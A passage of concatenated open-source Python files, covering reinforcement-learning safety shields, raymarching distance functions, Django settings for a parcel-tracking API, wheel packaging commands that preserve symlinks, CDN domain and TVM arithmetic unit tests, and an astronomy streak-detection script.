verified.split("#")[1] else: return false, none theta = (self.env.s_min, self.env.s_max) result, resultlist = verify_controller_z3(x0, theta, verification_oracle_continuous, learning_oracle_continuous, draw_oracle_continuous, continuous=true) print("shield synthesis result: {}".format(result)) if result: for (x, initial_size, inv, k) in resultlist: self.b_str_list.append(inv+"\n") self.b_list.append(barrier_certificate_str2func( inv, self.env.state_dim, enable_jit)) self.k_list.append(k) initial_range = np.array( [x - initial_size.reshape(len(initial_size), 1), x + initial_size.reshape(len(initial_size), 1)]) self.initial_range_list.append(initial_range) self.save_shield(os.path.split(self.model_path)[0]) else: self.load_shield(os.path.split(self.model_path)[0], enable_jit) @timeit def test_shield(self, actor, test_ep=1, test_step=5000, x0=None, mode="single", loss_compensation=0, shield_combo=1, mute=False): """test if shield works Args: test_ep (int, optional): test episodes test_step (int, optional): test step in each episode """ assert shield_combo > 0 assert loss_compensation >= 0 fail_time = 0 success_time = 0 fail_list = [] self.shield_count = 0 combo_remain = 0 for ep in xrange(test_ep): if x0 is not None: x = self.env.reset(x0) else: x = self.env.reset() init_x = x for i in xrange(test_step): u = np.reshape(actor.predict(np.reshape(np.array(x), \ (1, actor.s_dim))), (actor.a_dim, 1)) # safe or not if self.detector(x, u) or combo_remain > 0: if combo_remain == 0: combo_remain = shield_combo u = self.call_shield(x) if not mute: print("!shield at step {}".format(i)) combo_remain -= 1 # step x, _, terminal = self.env.step(u) # success or fail if terminal: if np.sum(np.power(self.env.xk, 2)) < self.env.terminal_err: success_time += 1 else: fail_time += 1 fail_list.append((init_x, x)) break if i == test_step-1: success_time += 1 print("----epoch: {} ----".format(ep)) print('initial state:\n', init_x, '\nterminal state:\n', x, '\nlast action:\n', self.env.last_u) print("----step: {} ----".format(i)) print('Success: {}, Fail: {}'.format(success_time, fail_time)) print('#############Fail List:###############') for (i, e) in fail_list: print('initial state:\n{}\nend state: \n{}\n----'.format(i, e)) print('shield times: {}, shield ratio: {}'.format(self.shield_count, 
float(self.shield_count)/(test_ep*test_step))) @timeit def shield_boundary(self, sample_ep=500, sample_step=100): """sample to find the state bound of shield Args: sample_ep (int, optional): epsoides sample_step (int, optional): step in each epsoide """ max_boundary = np.zeros([self.env.state_dim, 1]) min_boundary = np.zeros([self.env.state_dim, 1]) for ep in xrange(sample_ep): x = self.env.reset() for i in xrange(sample_step): u = self.call_shield(x) max_boundary, min_boundary = metrics.find_boundary( x, max_boundary, min_boundary) # step x, _, terminal = self.env.step(u) print('max_boundary:\n{}\nmin_boundary:\n{}'.format( max_boundary, min_boundary)) def learn_shield_gd(self, lr=0.00001, epsoides=100, steps=1000): K = np.random.random(self.env.state_dim) grad = np.zeros(self.env.state_dim) for ep in xrange(epsoides): self.env.reset() loss = 0 for step in xrange(steps): u = self.actor.predict(np.reshape(np.array(self.env.xk), (1, self.actor.s_dim))) grad += np.array(((K.dot(self.env.xk)-u).dot(self.env.xk.T)))[0] loss += np.sum(np.power((K.dot(self.env.xk)-u), 2)) self.env.step(u) K -= lr*grad print(loss) return K from functions import * import numpy as np import math # @njit(fastmath=True) # def sdf_scene(p, key): # # Return format: tuple(dist, color_number) # p = sub_vec3_n(mod_vec3_n(p, 2), 0.5 * 2) # return sdf_sphere(p, 0.3, (0.0, 0.0, 0.0, 0.0)), 0 @njit(fastmath=True) def sdf_scene(p, key): # Return format: tuple(dist, color_number) obj0 = (scaling_sdf(sdf_mandelbrot, p, key[0]), 0) return obj0 @njit(fastmath=True) def mapping_sdf(p, key): displacement = math.sin(key[3] * p[0]) * math.sin(key[3] * p[1]) * math.sin(key[3] * p[2]) * 0.25 return displacement @njit(fastmath=True) def scaling_sdf(sdf, p, scale): p = div_vec3_n(p, scale) d = sdf(p) return d * scale @njit(fastmath=True) def soft_min(a, b): k = 0.8 h = max(k - abs(a - b), 0.0) / k return min(a, b) - h ** 3 * k * (1.0 / 6.0) @njit(fastmath=True) def sdf_mandelbrot(p): zn = p hit = 0.0 r = 8.0 d = 2.0 for i in range(8): rad = length_vec3(zn) if rad > 2.0: hit = 0.5 * math.log(rad) * rad / d else: th = math.atan(length_vec2((zn[0], zn[1])) / zn[2]) phi = math.atan2(zn[1], zn[0]) rado = pow(rad, 8.0) d = pow(rad, 7.0) * 7.0 * d + 1.0 sint = math.sin(th * r) zn0 = rado * sint * math.cos(phi * r) zn1 = rado * sint * math.sin(phi * r) zn2 = rado * math.cos(th * r) zn = (zn0, zn1, zn2) zn = sum_vecs3(zn, p) return hit @njit(fastmath=True) def sdf_plane(p): return p[1] + 3.7 @njit(fastmath=True) def sdf_sphere(p, radius=0.3, delta=(0.0, 0.0, 0.0)): return math.sqrt((p[0] + delta[0]) ** 2 + (p[1] + delta[1]) ** 2 + (p[2] + delta[2]) ** 2) - radius @njit(fastmath=True) def sdf_octahedron(p): p = (abs(p[0]), abs(p[1]), abs(p[2])) return (p[0] + p[1] + p[2] - 0.1) * 0.57735027 @njit(fastmath=True, cache=True) def sdf_torus(p): #, time): # p = sum_vecs3(p, (0., -time * 2., -time)) # p = sub_vec3_n(mod_vec3_n(p, 8), 0.5 * 8) tmp1 = length_vec2((p[0], p[1])) return length_vec2((tmp1 - 0.6, p[2])) - 0.2 @njit(fastmath=True) def sdf_cube(p, d=(0,0,0)): b, r = (0.4, 0.4, 0.4), 0.4 q = (abs(p[0] + d[0]) - b[0], abs(p[1] + d[1]) - b[1], abs(p[2] + d[2]) - b[2]) return max((q[0], q[1], q[2], 0)) + min(max(q[0], max(q[1], q[2])), 0)""" A collection of software development tools. 
""" __author__ = '' track17/settings.py0 from django.conf import settings __all__ = ( 'TRACK17_API_KEY', 'TRACK17_API_KEY_FUNCTION', 'TRACK17_COUNTRIES_URL', 'TRACK17_CARRIERS_URL' ) TRACK17_API_KEY = getattr(settings, 'TRACK17_API_KEY', '') TRACK17_API_KEY_FUNCTION = getattr(settings, 'TRACK17_API_KEY_FUNCTION', None) TRACK17_COUNTRIES_URL = getattr( settings, 'TRACK17_COUNTRIES_URL', 'https://www.17track.net/en/apicountry' ) TRACK17_CARRIERS_URL = getattr( settings, 'TRACK17_CARRIERS_URL', 'https://www.17track.net/en/apicarrier' ) # -*- coding: utf-8 -*- # # (C) Copyright 2021 Karellen, Inc. (https://www.karellen.co/) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import contextlib import itertools import os import stat import warnings from distutils.cmd import Command from distutils.command.build_scripts import build_scripts from distutils.command.install_data import install_data from distutils.command.install_headers import install_headers from distutils.util import convert_path from glob import glob from setuptools.command.build_py import build_py from setuptools.command.egg_info import egg_info, manifest_maker, FileList from setuptools.command.install import install from setuptools.command.install_lib import install_lib from setuptools.command.install_scripts import install_scripts from wheel.bdist_wheel import bdist_wheel as _bdist_wheel, python_tag from wheel.vendored.packaging import tags from wheel_axle.bdist_axle._file_utils import copy_link, copy_tree from wheel_axle.runtime._symlinks import write_symlinks_file from wheel_axle.runtime.constants import AXLE_LOCK_FILE, SYMLINKS_FILE __version__ = "${dist_version}" WHEEL_AXLE_DEPENDENCY = "wheel-axle-runtime<1.0" class SymlinkAwareCommmand(Command): def initialize_options(self): super().initialize_options() self._symlinks = [] def copy_file(self, infile, outfile, preserve_mode=1, preserve_times=1, link=None, level=1): """Copy a file respecting verbose, dry-run and force flags. (The former two default to whatever is in the Distribution object, and the latter defaults to false for commands that don't define it.)""" if os.path.islink(infile): out = copy_link(infile, outfile, not self.force, dry_run=self.dry_run) self._symlinks.append(out) return out[0], 0 return super().copy_file(infile, outfile, preserve_mode=preserve_mode, preserve_times=preserve_times, link=link, level=level) def copy_tree(self, infile, outfile, preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1): """Copy an entire directory tree respecting verbose, dry-run, and force flags. 
""" output, symlinks = copy_tree(infile, outfile, preserve_mode, preserve_times, preserve_symlinks, not self.force, dry_run=self.dry_run) self._symlinks.extend(symlinks) return output def get_symlinks(self): return self._symlinks class InstallData(SymlinkAwareCommmand, install_data): def run(self): super().run() symlinks = set(self.get_symlinks()) outfiles = list(self.outfiles) for idx, f in enumerate(outfiles): if f in symlinks: del self.outfiles[idx] class InstallLib(SymlinkAwareCommmand, install_lib): def copy_tree( self, infile, outfile, preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1 ): assert preserve_mode and preserve_times and not preserve_symlinks exclude = self.get_exclusions() if not exclude: return super().copy_tree(infile, outfile) # Exclude namespace package __init__.py* files from the output from setuptools.archive_util import unpack_directory from distutils import log outfiles = [] def pf(src, dst): if dst in exclude: log.warn("Skipping installation of %s (namespace package)", dst) return False if os.path.islink(src): link_dest = os.readlink(src) link_dest_isdir = os.path.isdir(os.path.join(os.path.dirname(src), link_dest)) log.info("registering link %s (%s) -> %s", src, link_dest, dst) self._symlinks.append((dst, link_dest, link_dest_isdir)) return False else: log.info("copying %s -> %s", src, os.path.dirname(dst)) outfiles.append(dst) return dst unpack_directory(infile, outfile, pf) return outfiles def get_symlinks(self): symlinks = super().get_symlinks() exclude = self.get_exclusions() if exclude: return [f for f in symlinks if f[0] not in exclude] return symlinks class InstallHeaders(SymlinkAwareCommmand, install_headers): pass class InstallScripts(SymlinkAwareCommmand, install_scripts): pass class BuildPy(build_py): def make_writable(self, target): if os.path.isfile(target): os.chmod(target, os.stat(target).st_mode | stat.S_IWRITE) def build_package_data(self): """Copy data files into build directory""" for package, src_dir, build_dir, filenames in self.data_files: for filename in filenames: target = os.path.join(build_dir, filename) self.mkpath(os.path.dirname(target)) srcfile = os.path.join(src_dir, filename) outf, copied = self.copy_file(srcfile, target) self.make_writable(target) srcfile = os.path.abspath(srcfile) def copy_file(self, infile, outfile, preserve_mode=1, preserve_times=1, link=None, level=1): """Copy a file respecting verbose, dry-run and force flags. 
(The former two default to whatever is in the Distribution object, and the latter defaults to false for commands that don't define it.)""" if os.path.islink(infile): out = copy_link(infile, outfile, not self.force, dry_run=self.dry_run, reproduce_link=True) return out[0], 1 return super().copy_file(infile, outfile, preserve_mode=preserve_mode, preserve_times=preserve_times, link=link, level=level) def find_data_files(self, package, src_dir): """Return filenames for package's data files in 'src_dir'""" patterns = self._get_platform_patterns( self.package_data, package, src_dir, ) globs_expanded = map(glob, patterns) # flatten the expanded globs into an iterable of matches globs_matches = itertools.chain.from_iterable(globs_expanded) glob_files = filter(lambda x: os.path.isfile(x) or os.path.islink(x), globs_matches) files = itertools.chain( self.manifest_files.get(package, []), glob_files, ) return self.exclude_data_files(package, src_dir, files) class EggInfo(SymlinkAwareCommmand, egg_info): def find_sources(self): """Generate SOURCES.txt manifest file""" manifest_filename = os.path.join(self.egg_info, "SOURCES.txt") mm = ManifestMaker(self.distribution) mm.manifest = manifest_filename mm.run() self.filelist = mm.filelist class ManifestMaker(manifest_maker): def run(self): self.filelist = SymlinkAwareFileList() if not os.path.exists(self.manifest): self.write_manifest() # it must exist so it'll get in the list self.add_defaults() if os.path.exists(self.template): self.read_template() self.add_license_files() self.prune_file_list() self.filelist.sort() self.filelist.remove_duplicates() self.write_manifest() class SymlinkAwareFileList(FileList): def _safe_path(self, path): if os.path.islink(path): return True else: return super()._safe_path(path) class BuildScripts(SymlinkAwareCommmand, build_scripts): def copy_scripts(self): scripts = list(self.scripts) self.scripts.clear() symlinks = [] for script in scripts: script = convert_path(script) if os.path.exists(script) and os.path.islink(script): link_dest = os.readlink(script) link_dest_isdir = os.path.isdir(os.path.join(os.path.dirname(script), link_dest)) outfile = os.path.join(self.build_dir, os.path.basename(script)) symlinks.append((link_dest, outfile, link_dest_isdir)) else: self.scripts.append(script) try: outfiles, updated_files = super().copy_scripts() for link_dest, outfile, link_dest_isdir in symlinks: if os.path.exists(outfile): os.unlink(outfile) os.symlink(link_dest, outfile, link_dest_isdir) outfiles.append(outfile) return outfiles, updated_files finally: self.scripts.clear() self.scripts.extend(scripts) class Install(install): def get_symlinks(self): """Assembles the symlinks of all the sub-commands.""" symlinks = [] for cmd_name in self.get_sub_commands(): cmd = self.get_finalized_command(cmd_name) try: for filename in cmd.get_symlinks(): if filename not in symlinks: symlinks.append(filename) except AttributeError: pass return symlinks def initialize_options(self): super().initialize_options() def finalize_options(self): super().finalize_options() self._restore_install_lib() def _restore_install_lib(self): """ Undo secondary effect of `extra_path` adding to `install_lib` """ suffix = os.path.relpath(self.install_lib, self.install_libbase) if suffix.strip() == BdistAxle.AXLE_PTH_CONTENTS.strip(): self.install_lib = self.install_libbase def run(self): super().run() @contextlib.contextmanager def suppress_known_deprecation(): with warnings.catch_warnings(): warnings.filterwarnings("ignore", "setup.py install is deprecated") yield 
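# The symlink-aware commands above record each symlink they encounter as a
# small tuple; InstallLib.copy_tree, for example, appends
# (dst, link_dest, link_dest_isdir), and BdistAxle.egg2dist later hands the
# collected records to write_symlinks_file. Below is a minimal, self-contained
# sketch of deriving such a record from an on-disk symlink with the standard
# library (symlink_record is a hypothetical helper; the exact shape returned by
# copy_link is not shown in this file, so the tuple layout is an assumption).
import os

def symlink_record(src, dst):
    """Build a (dst, link_target, target_is_dir) record for the symlink at src (sketch)."""
    link_target = os.readlink(src)  # target path exactly as stored in the link
    target_is_dir = os.path.isdir(os.path.join(os.path.dirname(src), link_target))
    return (dst, link_target, target_is_dir)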
class BdistAxle(_bdist_wheel): user_options = list(_bdist_wheel.user_options) user_options += [("root-is-pure=", None, "set to manually override whether the wheel is pure " "(default: None)"), ("abi-tag=", None, "set to override ABI tag " "(default: None)"), ] boolean_options = list(_bdist_wheel.boolean_options) boolean_options += ["root-is-pure"] AXLE_PTH_CONTENTS = """import wheel_axle.runtime; wheel_axle.runtime.finalize(fullname);""" def initialize_options(self): super().initialize_options() self.abi_tag = None self.abi_tag_supplied = False self.python_tag = None self.python_tag_supplied = False self.distribution.extra_path = self.wheel_dist_name, self.AXLE_PTH_CONTENTS self.distribution.install_requires.append(WHEEL_AXLE_DEPENDENCY) def finalize_options(self): root_is_pure_supplied = self.root_is_pure is not None root_is_pure = self.root_is_pure self.abi_tag_supplied = self.abi_tag is not None self.python_tag_supplied = self.python_tag is not None if not self.python_tag_supplied: self.python_tag = python_tag() super().finalize_options() if root_is_pure_supplied: self.root_is_pure = bool(root_is_pure) def get_tag(self): tag = super().get_tag() tag = (self.python_tag if self.python_tag_supplied else tag[0], self.abi_tag if self.abi_tag_supplied else tag[1], tag[2]) supported_tags = [(t.interpreter, t.abi, tag[2]) for t in tags.sys_tags()] assert tag in supported_tags, "would build wheel with unsupported tag {}".format(tag) return tag def run(self): with suppress_known_deprecation(): def remove_patched_command_objs(): for k in patch_classes: if k in self.distribution.command_obj: del self.distribution.command_obj[k] patch_classes = {"install_data": InstallData, "install_lib": InstallLib, "install_headers": InstallHeaders, "install_scripts": InstallScripts, "build_scripts": BuildScripts, "build_py": BuildPy, "egg_info": EggInfo, "install": Install} old_cmdclass = dict(self.distribution.cmdclass) self.distribution.cmdclass.update(patch_classes) remove_patched_command_objs() try: super().run() finally: self.distribution.cmdclass = old_cmdclass remove_patched_command_objs() def egg2dist(self, egginfo_path, distinfo_path): super().egg2dist(egginfo_path, distinfo_path) install_cmd = self.get_finalized_command("install") symlinks = [(os.path.relpath(symlink[0], self.bdist_dir), symlink[1], symlink[2]) for symlink in install_cmd.get_symlinks()] write_symlinks_file(os.path.join(distinfo_path, SYMLINKS_FILE), symlinks) with open(os.path.join(distinfo_path, AXLE_LOCK_FILE), "wb"): pass def write_wheelfile(self, wheelfile_base, generator="bdist_axle (" + __version__ + ")"): return super().write_wheelfile(wheelfile_base, generator) # -*- coding: utf-8 -*- # Copyright (c) 2014 Rackspace, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. 
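# The BdistAxle command above temporarily swaps the symlink-aware command
# classes into the distribution's cmdclass around a normal bdist_wheel run.
# A minimal setup.py sketch of how a project might register it follows; the
# import location and the project metadata are assumptions, since only the
# wheel_axle.bdist_axle._file_utils import appears in this file.
from setuptools import setup, find_packages
from wheel_axle.bdist_axle import BdistAxle  # assumed import location

setup(
    name="example-project",  # hypothetical package name
    version="0.0.1",
    packages=find_packages(),
    cmdclass={"bdist_axle": BdistAxle},  # then: python setup.py bdist_axle
)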
import ddt

from poppy.model.helpers import domain
from tests.unit import base


@ddt.ddt
class TestDomain(base.TestCase):

    @ddt.unpack
    @ddt.data({'domain_name': 'www.mydomain.com',
               'changed_domain_name': 'www.changed-domain.com'},
              {'domain_name': u'www.düsseldorf-Lörick.com'.encode("utf-8"),
               'changed_domain_name': u'www.düsseldorf.com'.encode("utf-8")},
              {'domain_name': u'WWW.UPPERCASE.COM',
               'changed_domain_name': u'WWW.UPPERCASE-CHANGED.COM'})
    def test_domain(self, domain_name, changed_domain_name):
        mydomain = domain.Domain(domain_name)
        self.assertTrue(mydomain.domain.islower())

        # test all properties
        # domain
        self.assertEqual(mydomain.domain, domain_name.lower())
        self.assertEqual(mydomain.protocol, 'http')
        self.assertEqual(mydomain.certificate, None)

        mydomain.domain = changed_domain_name
        self.assertEqual(mydomain.domain, changed_domain_name.lower())

        try:
            mydomain.certificate = 'SAN'
        except ValueError:
            self.assertTrue(True)

        my_other_domain = domain.Domain.init_from_dict({"domain": domain_name})
        self.assertEqual(my_other_domain.domain, domain_name.lower())

        try:
            domain.Domain(domain_name, 'https')
        except ValueError:
            self.assertTrue(True)

        my_https_domain = domain.Domain(domain_name, 'https', 'san')
        self.assertEqual(my_https_domain.protocol, 'https')
        self.assertEqual(my_https_domain.certificate, 'san')

        try:
            my_https_domain.certificate = 'non-sense'
        except ValueError:
            self.assertTrue(True)
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm from tvm import te def test_cast(): analyzer = tvm.arith.Analyzer() x = te.var("x", dtype="int8") m = analyzer.modular_set((x * 3).astype("uint32")) assert m.coeff == 3 assert m.base == 0 m = analyzer.modular_set((x * 3 + 1).astype("float32").astype("int32")) assert m.coeff == 3 assert m.base == 1 def test_add_sub(): analyzer = tvm.arith.Analyzer() x, y = te.var("x", "int64"), te.var("y", "int64") m = analyzer.modular_set(x * 6 + y * 4) assert m.coeff == 2 assert m.base == 0 analyzer.bind(y, x * 4 + 1) m = analyzer.modular_set(1 - y) assert m.coeff == 4 assert m.base == 0 def test_mul(): analyzer = tvm.arith.Analyzer() x, y = te.var("x"), te.var("y") m = analyzer.modular_set((x * 4 + 2) * (y * 6 + 1)) assert m.coeff == 4 assert m.base == 2 def test_floormod(): analyzer = tvm.arith.Analyzer() x, y = te.var("x"), te.var("y") m = analyzer.modular_set(tvm.tir.floormod(x * 128 + y * 4, 256)) assert m.coeff == 4 assert m.base == 0 def test_div_shift(): analyzer = tvm.arith.Analyzer() x, y = te.var("x"), te.var("y") # not sure if x is non-negative tdiv = tvm.tir.truncdiv m = analyzer.modular_set(tdiv(x * 4 + 2, 2)) assert m.coeff == 1 assert m.base == 0 # right shift always round down so it is fine m = analyzer.modular_set((x * 4 + 2) >> 1) assert m.coeff == 2 assert m.base == 1 fld = tvm.te.floordiv m = analyzer.modular_set(fld(x * 4 + 2, 2)) assert m.coeff == 2 assert m.base == 1 # x is non-negative analyzer.update(x, tvm.arith.ConstIntBound(0, 100)) m = analyzer.modular_set(tdiv(x * 4 + 2, 2)) assert m.coeff == 2 assert m.base == 1 def test_min_max_select(): analyzer = tvm.arith.Analyzer() x, y = te.var("x"), te.var("y") m = analyzer.modular_set(tvm.te.min(x * 3, y * 9)) assert m.coeff == 3 assert m.base == 0 m = analyzer.modular_set(tvm.te.max(x * 3 + 1, y * 9 + 4)) assert m.coeff == 3 assert m.base == 1 m = analyzer.modular_set(tvm.tir.Select(x > 0, x * 3 + 1, y * 9 + 2)) assert m.coeff == 1 assert m.base == 0 def test_mix_index(): a = te.var("a") b = te.var("b") analyzer = tvm.arith.Analyzer() tdiv = tvm.tir.truncdiv m = analyzer.modular_set(a * 4 + b * 6 + 7) assert m.coeff == 2 assert m.base == 1 m = analyzer.modular_set((a * 4 + 1) * (b * 8 + 3)) assert m.coeff == 4 assert m.base == 3 m = analyzer.modular_set(tdiv(a * 4 + 1, b * 8 + 3)) assert m.coeff == 1 assert m.base == 0 m = analyzer.modular_set((a * 4 + 1) * tdiv(b * 8, 4)) assert m.coeff == 2 assert m.base == 0 m = analyzer.modular_set((a * 12 + 1) - (b * 3 * 7 + 2)) assert m.coeff == 3 assert m.base == 2 m = analyzer.modular_set(a * 12 + tvm.te.min(b * 3 * 7, 2)) assert m.coeff == 1 assert m.base == 0 def test_constraint_scope(): a = te.var("a") b = te.var("b") analyzer = tvm.arith.Analyzer() tmod = tvm.tir.truncmod with analyzer.constraint_scope(tmod(b, 4) == 2): m = analyzer.modular_set(b + 1) assert m.coeff == 4 assert m.base == 3 with analyzer.constraint_scope(tmod(a, 2) == 1): m = analyzer.modular_set(b + a * 2) assert m.coeff == 4 assert m.base == 0 m = analyzer.modular_set(b + a * 2) assert m.coeff == 2 assert m.base == 0 m = analyzer.modular_set(b + 1) assert m.coeff == 1 assert m.base == 0 def test_intersect(): a = te.var("a") analyzer = tvm.arith.Analyzer() tmod = tvm.tir.truncmod with analyzer.constraint_scope(tmod(a, 4) == 1): with analyzer.constraint_scope(tmod(a, 3) == 1): m = analyzer.modular_set(a) assert m.coeff == 12 assert m.base == 1 with analyzer.constraint_scope(tmod(a, 3) == 2): with analyzer.constraint_scope(tmod(a, 5) == 3): with analyzer.constraint_scope(tmod(a, 7) == 2): m = 
analyzer.modular_set(a) assert m.coeff == 105 assert m.base == 23 def test_let(): analyzer = tvm.arith.Analyzer() x = te.var("x") y = te.var("y") m = analyzer.modular_set(tvm.tir.Let(x, y * 10, x + 1)) m.coeff = 10 m.base = 1 if __name__ == "__main__": test_let() test_cast() test_add_sub() test_mul() test_div_shift() test_floormod() test_min_max_select() test_mix_index() test_constraint_scope() test_intersect() #! /usr/bin/env python # # 1440 files took about 38 mins # from __future__ import print_function from tkinter import filedialog from tkinter import * from astride import Streak import glob import sys import shutil import os import tkinter as tk import matplotlib.pyplot as plt from astropy.io import fits import numpy as np class _Args: file_pathin = "" file_pathout = "" shape = 0.14 area = 120 contour = 12 diff = False v = False start_frame = -1 end_frame = -1 def get_arg(argv): arguments = _Args() if len(argv) == 1: return get_int_arg(arguments) else: return get_cmd_arg(argv, arguments) def mk_diff(f0,f1,diff, v): hdu0 = fits.open(f0, ignore_missing_end=True) hdu1 = fits.open(f1, ignore_missing_end=True) h1 = hdu1[0].header d0 = hdu0[0].data d1 = hdu1[0].data if v: print("DEBUG mean/std: %s %s %s %g %g" % (f0,f1,diff,d0.mean(),d0.std())) d2 = d1-d0 fits.writeto(diff,d2,h1,overwrite=True) def get_cmd_arg(argv, arguments): import argparse as ap parser = ap.ArgumentParser() parser.add_argument('-i','--filein', nargs=1,help = 'Directory to input fits directory') parser.add_argument('-o','--fileout', nargs=1,help = 'Directory to output folder') parser.add_argument('-s','--shape', nargs=1,help = 'Shape factor') parser.add_argument('-a','--area', nargs=1,help = 'Minimum area to be considered a streak') parser.add_argument('-c','--contour',nargs=1,help = 'Control value') parser.add_argument('-d','--difference',action = 'store_const',const = arguments.diff , help = 'Create difference images') parser.add_argument('-v','--verbose', action = 'store_const', const = arguments.v, help = 'Verbose') parser.add_argument('-S','--start',nargs = 1, help = 'Start Frame (starts at 1)') parser.add_argument('-E','--end', nargs = 1, help = 'End Frame') args=vars(parser.parse_args()) if args['filein'] != None: arguments.file_pathin = (args['filein'][0]) if args['fileout'] != None: arguments.file_pathout = (args['fileout'][0]) else: if arguments.file_pathin.endswith("/"): arguments.file_pathout = arguments.file_pathin[0:len(arguments.file_pathin) -1] + "-output" else: arguments.file_pathout = arguments.file_pathin +"-output" if args['shape'] != None: arguments.shape = float(args['shape'][0]) if args['area'] != None: arguments.area = float(args['area'][0]) if args['contour'] != None: arguments.contour = float(args['contour'][0]) if args['difference'] != None: arguments.diff = True if args['verbose'] != None: arguments.v = True if args['start'] != None: arguments.start_frame = int(args['start'][0]) if args['end'] != None: arguments.end_frame = int(args['end'][0]) return arguments def get_int_arg(arguments): #Creates folder input browsers winin = tk.Tk() winin.withdraw() winin.attributes('-topmost', True) arguments.file_pathin = filedialog.askdirectory(title = "Select input") #Creates folder output browsers winout = tk.Tk() winout.withdraw() winout.attributes('-topmost', True) arguments.file_pathout = filedialog.askdirectory(title = "Select output") winout.destroy() winin.destroy() top = tk.Tk() nshape = tk.StringVar() narea = tk.StringVar() ncontour = tk.StringVar() nstart_frame = tk.StringVar() nend_frame = 
tk.StringVar() ndiff = tk.IntVar() nv = tk.IntVar() L1 = Label(top, text="Shape value (1=circle, .1=thin oval) (default = 0.14): ") L1.pack() eshape = Entry(top, textvariable=nshape) #nshape = float(nshape.get()) eshape.pack() L2 = Label(top, text="Minimum area (default = 120): ") L2.pack() earea = Entry(top, textvariable=narea) #narea = float(narea.get()) earea.pack() L3 = Label(top, text="Contour value (higher=only brighter streaks detected)(default = 12): ") L3.pack() econtour = Entry(top, textvariable=ncontour) #ncontour = float(ncontour.get()) econtour.pack() L4 = Label(top, text="Frame at which to start (default = 1)") L4.pack() estart_frame = Entry(top, textvariable=nstart_frame) #nstart_frame = float(nstart_frame.get()) estart_frame.pack() L5 = Label(top, text="Last frame (does not process last frame) (default goes to end)") L5.pack() eend_frame = Entry(top, textvariable=nend_frame) #nend_frame = float(nend_frame.get()) eend_frame.pack() C1 = Checkbutton(top, text = "Difference imaging (default = false)", variable = ndiff, \ onvalue=1, offvalue=0 ) C2 = Checkbutton(top, text = "Verbose mode (default = false)", variable = nv, \ onvalue = 1, offvalue = 0 ) def save(nshape, narea, ncontour, nstart_frame, nend_frame, ndiff, nv): if len(nshape.get()) != 0: arguments.shape = float(nshape.get()) if len(narea.get()) != 0: arguments.area = float(narea.get()) if len(ncontour.get()) != 0: arguments.contour = float(ncontour.get()) if len(nstart_frame.get()) != 0: arguments.start_frame = int(nstart_frame.get()) if len(nend_frame.get()) != 0: arguments.end_frame = int(nend_frame.get()) arguments.diff = ndiff.get() arguments.v = nv.get() top.destroy() s = Button(top, text="Save Values", command=lambda: save(nshape, narea, ncontour, nstart_frame, nend_frame, ndiff, nv)) C1.pack() C2.pack() s.pack() top.mainloop() return(arguments) def do_dir(arguments): """ process a directory 'd' """ #print("Outputting in directory: " + dsum) if not os.path.exists(arguments.file_pathout): os.mkdir(arguments.file_pathout) num = 0 detected = 0 fileCount = 0 zero_image = 0 bad_image = 0 bad_image_paths = [] # debug/verbose if arguments.v: print('DEBUG: shape=%g area=%g contour=%g' % (arguments.shape,arguments.area,arguments.contour)) ffs = glob.glob(arguments.file_pathin+'/*.FIT') + glob.glob(arguments.file_pathin+'/*.fit') + \ glob.glob(arguments.file_pathin+'/*.FTS') + glob.glob(arguments.file_pathin+'/*.fts') + \ glob.glob(arguments.file_pathin+'/*.FITS') + glob.glob(arguments.file_pathin+'/*.fits') ffs = list(set(ffs)) # needed for dos ffs.sort() # on linux wasn't sorted, on dos it was f = open(arguments.file_pathout+'/summary.txt','w') # Creates summary text file f.write('Streaks found in files: \n') #Creates first line for summary file sf = arguments.start_frame ef = arguments.end_frame if sf <= 0: sf = 1 if ef <= 0 or ef > len(ffs): ef = len(ffs) if ef < sf: temp = sf sf = ef ef = temp print('Processing %d files from %d to %d' % ((ef-sf+1), sf, ef)) for ff in ffs[sf-1:ef]: # creates directory one directory back from the folder which contains fits files num = do_one(ff,arguments.file_pathout+'/'+ff[ff.rfind(os.sep)+1:ff.rfind('.')],arguments.shape,arguments.area,arguments.contour) if num == 0: zero_image += 1 elif num < 0: bad_image += 1 bad_image_paths.append(ff) else: detected += int(num) #Counter of how many streaks detected f.write(ff + '\n') fileCount += 1 #Counter for how many files analyzed print("\n") # Produce and write summary file f.write('\n' 'Files analyzed: ' + str(fileCount)+ '\n' ) 
